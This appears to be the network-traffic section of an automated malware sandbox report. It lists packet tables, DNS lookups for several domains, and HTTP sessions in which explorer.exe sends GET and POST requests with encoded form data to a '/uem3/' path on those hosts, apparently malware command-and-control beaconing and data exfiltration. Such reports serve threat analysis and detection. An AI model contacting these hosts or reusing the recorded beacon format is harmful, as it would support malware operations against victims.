Jun 21, 2022 21:09:08.884991884 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.885013103 CEST	49864	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.893474102 CEST	80	49865	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.893501043 CEST	80	49865	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:08.893709898 CEST	49865	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.894756079 CEST	49865	80	192.168.2.5	213.186.33.5
Jun 21, 2022 21:09:08.923779964 CEST	80	49865	213.186.33.5	192.168.2.5
Jun 21, 2022 21:09:18.988737106 CEST	49870	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.007702112 CEST	80	49870	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.008443117 CEST	49870	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.008758068 CEST	49870	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.008892059 CEST	49870	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.009524107 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.027726889 CEST	80	49870	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.028103113 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.029215097 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.031171083 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.031738043 CEST	49872	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.032814026 CEST	80	49870	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.049885988 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.049904108 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.049912930 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.049925089 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.049990892 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.050004005 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.050020933 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.050074100 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.050156116 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.050162077 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.050175905 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.050188065 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.050199032 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.050215960 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.050230980 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.050242901 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.050508022 CEST	80	49872	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.051609039 CEST	49872	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.051846027 CEST	49872	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.068919897 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.068974972 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069010019 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069047928 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069078922 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069106102 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069132090 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069149971 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069166899 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069190979 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069215059 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069246054 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069283009 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069318056 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069345951 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069370031 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.069396019 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.070609093 CEST	80	49872	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.074415922 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.127027035 CEST	80	49870	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.127137899 CEST	80	49870	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.127289057 CEST	49870	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.127361059 CEST	49870	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.170020103 CEST	80	49872	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.170073032 CEST	80	49872	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.170269012 CEST	49872	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.170348883 CEST	49872	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.209928989 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.209966898 CEST	80	49871	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:19.210170031 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.210215092 CEST	49871	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.563095093 CEST	49872	80	192.168.2.5	34.102.136.180
Jun 21, 2022 21:09:19.582122087 CEST	80	49872	34.102.136.180	192.168.2.5
Jun 21, 2022 21:09:24.249959946 CEST	49900	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.487035990 CEST	80	49900	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.487220049 CEST	49900	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.487354994 CEST	49900	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.487447977 CEST	49900	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.487798929 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.697077036 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.698368073 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.700100899 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.701015949 CEST	49903	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.724219084 CEST	80	49900	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.763812065 CEST	80	49900	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.800724983 CEST	80	49900	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.800754070 CEST	80	49900	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.800903082 CEST	49900	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.800920963 CEST	49900	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.909435034 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.909466982 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.909495115 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.909522057 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.909621954 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.909712076 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.981631994 CEST	80	49903	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:24.981834888 CEST	49903	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:24.982079029 CEST	49903	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:25.119122982 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119158983 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119177103 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119189024 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119205952 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119224072 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119240046 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119307995 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119374037 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.119462013 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.158736944 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.190330029 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.190352917 CEST	80	49902	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.191843987 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:25.191898108 CEST	49902	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:25.262507915 CEST	80	49903	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.263449907 CEST	80	49903	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.263470888 CEST	80	49903	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:25.263856888 CEST	49903	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:25.263909101 CEST	49903	80	192.168.2.5	101.36.112.119
Jun 21, 2022 21:09:25.544413090 CEST	80	49903	101.36.112.119	192.168.2.5
Jun 21, 2022 21:09:30.769190073 CEST	49919	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:30.940320969 CEST	80	49919	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:30.940465927 CEST	49919	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:30.955770016 CEST	49919	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:30.955828905 CEST	49919	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:30.956338882 CEST	49920	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.127432108 CEST	80	49919	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.127458096 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.127470016 CEST	80	49919	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.127634048 CEST	49919	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.128529072 CEST	49920	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.168019056 CEST	49920	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.168525934 CEST	49922	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.339214087 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.339245081 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.339440107 CEST	49920	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.344691992 CEST	80	49922	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.344866991 CEST	49922	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.510700941 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.510746956 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.510775089 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.510880947 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.510905027 CEST	49920	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.510909081 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.511142015 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.682275057 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.682331085 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.682369947 CEST	80	49920	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.770924091 CEST	49922	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.950568914 CEST	80	49922	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.950623989 CEST	80	49922	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.950658083 CEST	80	49922	154.94.246.226	192.168.2.5
Jun 21, 2022 21:09:31.950922966 CEST	49922	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:31.987545013 CEST	49922	80	192.168.2.5	154.94.246.226
Jun 21, 2022 21:09:32.163775921 CEST	80	49922	154.94.246.226	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 21, 2022 21:08:50.761450052 CEST	50381	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:08:50.937449932 CEST	53	50381	8.8.8.8	192.168.2.5
Jun 21, 2022 21:09:03.567302942 CEST	59558	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:09:03.601406097 CEST	53	59558	8.8.8.8	192.168.2.5
Jun 21, 2022 21:09:08.715135098 CEST	61384	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:09:08.753549099 CEST	53	61384	8.8.8.8	192.168.2.5
Jun 21, 2022 21:09:18.944178104 CEST	53759	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:09:18.985337973 CEST	53	53759	8.8.8.8	192.168.2.5
Jun 21, 2022 21:09:24.210597992 CEST	56422	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:09:24.248754025 CEST	53	56422	8.8.8.8	192.168.2.5
Jun 21, 2022 21:09:30.696115971 CEST	61901	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:09:30.732772112 CEST	53	61901	8.8.8.8	192.168.2.5
Jun 21, 2022 21:09:37.003717899 CEST	52061	53	192.168.2.5	8.8.8.8
Jun 21, 2022 21:09:37.306735992 CEST	53	52061	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 21, 2022 21:08:50.761450052 CEST	192.168.2.5	8.8.8.8	0xa14	Standard query (0)	www.timinis23.com	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:03.567302942 CEST	192.168.2.5	8.8.8.8	0x797a	Standard query (0)	www.astrofrance.online	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:08.715135098 CEST	192.168.2.5	8.8.8.8	0x1f08	Standard query (0)	www.domainedelapoujade.info	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:18.944178104 CEST	192.168.2.5	8.8.8.8	0x1b77	Standard query (0)	www.homesteaddesignstudio.net	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:24.210597992 CEST	192.168.2.5	8.8.8.8	0xcbfe	Standard query (0)	www.xjyjjy.com	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:30.696115971 CEST	192.168.2.5	8.8.8.8	0x194d	Standard query (0)	www.duckholland.com	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:37.003717899 CEST	192.168.2.5	8.8.8.8	0x9af8	Standard query (0)	www.chahuajie.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 21, 2022 21:08:50.937449932 CEST	8.8.8.8	192.168.2.5	0xa14	No error (0)	www.timinis23.com		199.192.23.166	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:03.601406097 CEST	8.8.8.8	192.168.2.5	0x797a	No error (0)	www.astrofrance.online		188.114.96.6	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:03.601406097 CEST	8.8.8.8	192.168.2.5	0x797a	No error (0)	www.astrofrance.online		188.114.97.6	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:08.753549099 CEST	8.8.8.8	192.168.2.5	0x1f08	No error (0)	www.domainedelapoujade.info		213.186.33.5	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:18.985337973 CEST	8.8.8.8	192.168.2.5	0x1b77	No error (0)	www.homesteaddesignstudio.net	homesteaddesignstudio.net		CNAME (Canonical name)	IN (0x0001)
Jun 21, 2022 21:09:18.985337973 CEST	8.8.8.8	192.168.2.5	0x1b77	No error (0)	homesteaddesignstudio.net		34.102.136.180	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:24.248754025 CEST	8.8.8.8	192.168.2.5	0xcbfe	No error (0)	www.xjyjjy.com	xjyjjy.com.lo1442.faipod.com		CNAME (Canonical name)	IN (0x0001)
Jun 21, 2022 21:09:24.248754025 CEST	8.8.8.8	192.168.2.5	0xcbfe	No error (0)	xjyjjy.com.lo1442.faipod.com		101.36.112.119	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:30.732772112 CEST	8.8.8.8	192.168.2.5	0x194d	No error (0)	www.duckholland.com		154.94.246.226	A (IP address)	IN (0x0001)
Jun 21, 2022 21:09:37.306735992 CEST	8.8.8.8	192.168.2.5	0x9af8	No error (0)	www.chahuajie.com		45.199.106.100	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.timinis23.com

www.astrofrance.online

www.domainedelapoujade.info

www.homesteaddesignstudio.net

www.xjyjjy.com

www.duckholland.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49855	199.192.23.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:08:51.122010946 CEST	10968	OUT	GET /uem3/?SH=IDKTKDM&BpE=0e5ylS0mR5Iv24OzcR2s4uNeaAp+yJmWD1izpzSJBOsV3UDfR6yWX1PKUNeuwqbGEXMx HTTP/1.1 Host: www.timinis23.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 21, 2022 21:08:51.379797935 CEST	10969	IN	HTTP/1.1 404 Not Found Date: Tue, 21 Jun 2022 19:08:51 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 69 6d 69 6e 69 73 32 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.timinis23.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49860	188.114.96.6	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:03.622292995 CEST	10989	OUT	POST /uem3/ HTTP/1.1 Host: www.astrofrance.online Connection: close Content-Length: 713 Cache-Control: no-cache Origin: http://www.astrofrance.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.astrofrance.online/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 75 79 4a 4b 44 46 49 35 4d 75 6f 6c 6a 78 77 75 75 67 65 32 63 37 50 52 4e 49 46 74 4b 6d 61 64 4e 4f 78 41 57 78 5a 37 42 42 64 70 4a 61 71 71 38 4c 50 42 57 74 74 78 30 78 6b 2d 4c 4e 76 54 55 51 50 30 44 49 72 31 59 54 52 67 31 38 6d 41 37 55 57 43 6f 36 48 64 67 68 6e 73 31 79 32 57 55 4e 28 66 43 51 75 56 31 4f 46 51 34 35 6f 32 7e 4a 46 77 38 74 31 66 5a 61 67 4b 61 49 5a 57 71 64 32 64 35 4e 52 30 56 37 57 7a 6b 44 73 65 58 68 4b 63 48 72 61 4f 70 71 38 35 58 6f 75 57 4d 33 78 5a 49 6e 56 39 44 45 6a 68 43 5a 4a 72 4a 6c 46 42 6c 6e 45 4b 6c 59 4f 38 77 41 72 4a 79 75 52 78 47 6b 31 71 4c 75 6e 50 39 33 39 47 64 55 4a 32 59 6a 33 46 4e 74 54 50 4b 6f 48 6f 61 4c 70 52 31 6d 74 46 4b 75 44 70 67 4b 4a 47 59 44 42 61 51 47 39 37 7e 65 7a 30 65 55 34 72 78 72 7a 4d 6d 6e 59 68 52 30 46 50 6b 6e 74 67 75 57 36 31 39 63 54 7a 71 34 67 6f 32 57 39 4b 6b 74 59 4f 4a 47 6d 6b 36 6b 35 79 4e 4c 4c 4e 6a 64 51 44 44 66 72 6d 6a 54 71 47 43 62 31 46 6f 47 55 68 49 4b 7e 67 50 76 32 78 57 5a 61 63 31 49 52 56 34 63 62 70 4a 33 70 4b 4c 61 6d 4b 34 75 6e 34 37 75 6d 71 39 75 50 58 6b 51 4c 67 65 35 30 72 61 71 76 71 42 5f 45 75 44 43 54 62 43 7a 5a 46 4e 63 7a 58 31 67 74 77 31 56 47 68 7e 74 34 77 62 6a 74 2d 64 69 7a 42 72 77 62 56 6f 64 45 68 79 6a 6b 78 7a 43 6c 75 28 54 6e 76 6d 4c 35 69 4d 73 41 53 50 68 48 45 43 53 67 69 66 69 66 55 5a 4c 4b 33 66 6e 39 58 48 6d 30 45 5a 4c 49 67 68 5a 64 6d 5a 5a 6b 36 32 2d 68 6d 65 44 33 6a 37 51 6e 63 49 76 6d 62 6a 2d 73 5a 41 48 74 32 6e 6f 4c 32 7e 47 51 2d 35 65 77 7a 38 6a 4f 41 44 63 53 41 49 43 4e 44 36 55 64 71 6e 62 56 71 4e 47 7a 35 7a 43 79 5f 47 4f 4c 78 79 6f 4f 6b 68 4c 58 45 4d 51 28 56 71 30 71 63 47 5f 71 39 32 74 78 71 48 49 74 6b 50 56 73 33 72 39 44 4d 42 4c 68 68 6c 61 76 30 67 59 6b 45 34 6c 33 68 38 72 6f 5f 59 63 63 38 4d 37 43 57 7e 5f 46 78 76 51 55 53 4a 79 63 5f 44 66 65 4e 68 69 45 47 68 78 6a 66 67 79 41 43 74 54 42 4e 4b 6c 42 45 56 63 54 75 32 4b 30 37 53 63 79 48 67 75 79 33 6f 58 56 52 36 75 6b 74 47 37 39 69 52 5a 32 48 41 53 50 56 34 55 73 43 28 31 52 4d 59 2d 4b 71 53 57 4a 32 34 52 51 30 73 6e 62 77 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=uyJKDFI5Muoljxwuuge2c7PRNIFtKmadNOxAWxZ7BBdpJaqq8LPBWttx0xk-LNvTUQP0DIr1YTRg18mA7UWCo6Hdghns1y2WUN(fCQuV1OFQ45o2~JFw8t1fZagKaIZWqd2d5NR0V7WzkDseXhKcHraOpq85XouWM3xZInV9DEjhCZJrJlFBlnEKlYO8wArJyuRxGk1qLunP939GdUJ2Yj3FNtTPKoHoaLpR1mtFKuDpgKJGYDBaQG97~ez0eU4rxrzMmnYhR0FPkntguW619cTzq4go2W9KktYOJGmk6k5yNLLNjdQDDfrmjTqGCb1FoGUhIK~gPv2xWZac1IRV4cbpJ3pKLamK4un47umq9uPXkQLge50raqvqB_EuDCTbCzZFNczX1gtw1VGh~t4wbjt-dizBrwbVodEhyjkxzClu(TnvmL5iMsASPhHECSgififUZLK3fn9XHm0EZLIghZdmZZk62-hmeD3j7QncIvmbj-sZAHt2noL2~GQ-5ewz8jOADcSAICND6UdqnbVqNGz5zCy_GOLxyoOkhLXEMQ(Vq0qcG_q92txqHItkPVs3r9DMBLhhlav0gYkE4l3h8ro_Ycc8M7CW~_FxvQUSJyc_DfeNhiEGhxjfgyACtTBNKlBEVcTu2K07ScyHguy3oXVR6uktG79iRZ2HASPV4UsC(1RMY-KqSWJ24RQ0snbwCA).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49900	101.36.112.119	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:24.487354994 CEST	11647	OUT	POST /uem3/ HTTP/1.1 Host: www.xjyjjy.com Connection: close Content-Length: 713 Cache-Control: no-cache Origin: http://www.xjyjjy.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.xjyjjy.com/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 46 65 4f 47 52 47 67 7a 62 38 53 43 52 4a 55 47 54 39 76 2d 7e 6c 70 35 50 35 57 4c 69 79 73 7a 39 41 6a 44 52 53 68 70 39 79 30 51 4c 75 57 5a 34 70 4d 38 42 36 6b 68 28 57 77 36 28 54 69 7a 51 63 37 65 37 30 28 79 49 58 53 50 6a 4e 36 66 6f 4f 68 6d 56 69 33 35 50 65 75 39 53 7a 45 67 34 39 37 4f 4e 6e 4c 34 46 5f 6f 7a 71 37 4c 4c 5a 33 65 4d 56 55 5a 52 63 6f 6c 7a 54 75 4c 6f 75 2d 67 37 68 37 4c 65 73 68 72 6a 65 31 41 6e 61 70 6b 4a 6a 42 32 41 48 4c 51 4c 48 34 6f 43 33 37 79 38 70 69 47 33 70 77 28 67 34 67 51 56 33 42 67 50 78 39 78 35 34 67 7e 71 76 6a 59 4c 34 32 7e 66 32 38 30 5a 55 51 6e 56 58 6c 76 2d 39 58 72 36 59 4f 35 32 48 58 36 53 75 70 53 49 61 35 46 5f 35 37 6e 49 70 6d 67 4b 6e 6e 71 70 4a 4d 46 69 6b 77 74 37 42 67 52 45 75 75 71 76 75 51 37 6b 43 78 45 32 4b 63 64 73 47 67 38 52 45 36 54 50 36 59 42 76 34 4d 67 5a 6f 67 73 4e 33 70 46 77 77 5f 68 69 69 51 46 64 55 30 51 73 54 4a 48 77 61 78 34 55 5a 48 68 7a 67 59 75 4a 35 6f 55 70 76 71 78 5f 76 35 6b 76 59 70 7a 36 47 50 65 57 61 71 4d 33 34 77 43 6c 73 53 79 49 57 65 35 74 6f 78 39 47 49 72 4b 46 41 48 6b 58 7a 77 75 71 4b 4e 46 43 30 37 35 69 5a 45 45 6e 4a 49 66 4c 38 41 50 38 4f 53 76 6f 64 34 54 54 49 49 58 44 50 44 49 62 6d 46 57 67 39 70 50 51 45 4d 34 71 50 44 74 44 70 4d 51 66 30 61 43 79 46 68 54 6c 62 61 63 72 42 48 62 54 35 58 6c 48 38 53 4e 75 28 61 73 4d 56 66 63 47 65 70 5a 55 44 49 66 6f 78 5f 71 46 58 44 43 71 78 7a 69 31 6a 4c 6d 4f 31 52 47 42 39 68 34 5a 35 6d 77 58 43 66 72 49 6c 31 7e 5f 54 54 4a 35 42 33 64 47 62 45 59 6d 57 36 54 52 58 49 56 41 72 52 6c 5f 34 75 73 4c 4a 6b 68 41 32 56 42 37 41 78 4a 48 6d 79 77 4c 4d 44 7a 7a 4d 65 4c 72 31 5a 33 73 6e 72 68 47 42 69 36 4a 67 48 4a 76 65 4a 33 64 34 51 6f 66 63 43 65 6c 52 42 36 67 4e 6c 47 41 6d 42 4e 2d 50 39 6c 46 56 41 43 50 76 73 57 62 7e 38 76 4a 45 4e 62 34 55 57 31 38 71 36 53 36 4b 4c 35 4b 34 48 61 37 75 62 45 79 62 54 30 6a 4b 51 56 57 38 48 30 57 4b 38 7e 34 63 39 4e 47 4b 77 77 41 41 38 4c 57 77 49 6f 7a 54 78 53 47 58 41 39 46 6b 54 35 75 4c 6a 4b 63 63 55 58 48 46 48 61 6c 6c 76 79 6a 34 5f 73 4f 62 4f 54 65 76 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 